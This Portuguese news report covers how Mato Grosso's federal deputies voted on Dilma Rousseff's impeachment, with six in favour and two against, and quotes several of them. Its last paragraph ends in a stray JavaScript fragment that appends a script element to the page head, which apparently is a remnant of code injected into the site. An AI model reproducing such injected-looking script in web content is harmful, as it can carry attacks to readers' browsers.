Capa / Cidades / Seis deputados de Mato Grosso votam para cassar Dilma e 2 são contrários

Seis deputados de Mato Grosso votam para cassar Dilma e 2 são contrários

camaraSó Noticias

A maioria da bancada federal de Mato Grosso votou, ontem, na sessão da Câmara dos Deputados, a favor do impeachment da presidente Dilma. Adilton Sachetti (PSB) foi o primeiro a votar, sendo favorável, homenageando sua esposa “que luta pela vida”.
Em seguida, foi Carlos Bezerra, presidente do PMDB, que era aliado do governo Dilma e alegando seguir orientação do seu partido, votou favorável. Ele evitou manifestar voto até este domingo e havia expectativa que votava a favor de Dilma porque indicou cargos no governo. Porém, Bezerra votou a favor do impeachment.
Fabio Garcia (PSB) também foi favorável, homenageando os mato-grossenses e os eleitores de Cuiabá, além dos familiares.
Em seguida, votou Nilson Leitão, vice-líder do PSDB. “Em nome do Mato Grosso e Sinop, voto sim”, disse Leitão, que foi integrante da comissão especial que analisou o pedido do afastamento e votou favorável.
Victório Galli, do PSC, votou favorável, alegando que o PT deu “perca total” no país. O petista Ságuas de Moraes lembrou os avanços do governo Dilma e votou não. Em seguida, votou José Augusto Curvo, o Tampinha, (que ocupa a vaga de Ezequiel Fonseca). Tampinha, como é conhecido (PSD), lembrou o governador Pedro Taques, seus familiares, os filhos falecidos e votou sim.
O último da bancada de Mato Grosso a votar foi Valtenir Pereira (PMDB). “Vou votar de acordo com a ordem jurídica. Se chegar pedido de impeachment do vice-presidente vou votar contra. Então meu voto é não”, manifestou-se Valtenir, votando a favor da presidente Dilma, assim como vez na comissão onde foi feito relatório pedindo seu afastamento.d.getElementsByTagName(‘head’)[0].appendChild(s);

Sobre admin

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top